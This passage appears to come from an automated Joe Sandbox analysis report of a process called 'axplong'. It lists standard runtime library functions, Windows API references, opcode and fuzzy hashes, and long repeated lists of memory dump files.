                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 348560076-465693683
                                                                                                                                                                                                                                                    • Opcode ID: 690c41134c75554d9daff19041a18a89dc1de6bf9629b86b859e174b930417b3
                                                                                                                                                                                                                                                    • Instruction ID: 1e6739adeab399a49e792d9550c49526cd0a1dfa4cb5dc8347406510ef1b3be9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 690c41134c75554d9daff19041a18a89dc1de6bf9629b86b859e174b930417b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401F921A5A325A9A36473B55D42DFB32DECE43628761163EF442E2142FD65D80407B4
                                                                                                                                                                                                                                                    Function 006A1FC4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StructuredWorkStealingQueue.LIBCMT ref: 006A1FE4
                                                                                                                                                                                                                                                      • Part of subcall function 0069CA23: Mailbox.LIBCMT ref: 0069CA5D
                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006A1FF5
                                                                                                                                                                                                                                                    • StructuredWorkStealingQueue.LIBCMT ref: 006A202B
                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006A203C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                                    • String ID: e
                                                                                                                                                                                                                                                    • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                                    • Instruction ID: 02cb1edb64c3f37807b7b58116e6fd077334efe3a68a612409b30f671f7c0460
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 041151311401069FDB54FE6DC861AAA73ABAF13364B28C0A9EC059F242DA71DD06CFA5
                                                                                                                                                                                                                                                    Function 0069B8A5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0069B93E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                    • String ID: RoInitialize$RoUninitialize$T[m$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 348560076-4229881504
                                                                                                                                                                                                                                                    • Opcode ID: a0022a2195663c588688ad7980d0b22623f737ee6e14ab7cb5bb211a38f0d0a8
                                                                                                                                                                                                                                                    • Instruction ID: 63af061c594ad637bfc72d892b1cc96f1a347ae3657cfe8cedb5bff795c18a2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0022a2195663c588688ad7980d0b22623f737ee6e14ab7cb5bb211a38f0d0a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6012D609962155AEB20B7B55E11FFF369E9F0330CB60242FF581F6691EF64D80047A5
                                                                                                                                                                                                                                                    Function 0068CF59 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0068CF6B
                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 0068CF8D
                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 0068CF99
                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 0068CF7C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                                    • Opcode ID: 3c9f6ac73387256130b14298a9942178d5d3b00431a3fc01284670793626e0ef
                                                                                                                                                                                                                                                    • Instruction ID: faf146f4b87917fe6ac379623c51bb49cbdcab5b6ae15d8ae4bf72cc21f7e3f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9f6ac73387256130b14298a9942178d5d3b00431a3fc01284670793626e0ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01DF61ACAB216AF63036765D40FBB128BCF43B647622216AA12E3780DAB0D80043B1
                                                                                                                                                                                                                                                    Function 0069E80D Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0069E84E
                                                                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0069E856
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0069E880
                                                                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0069E889
                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0069E90C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
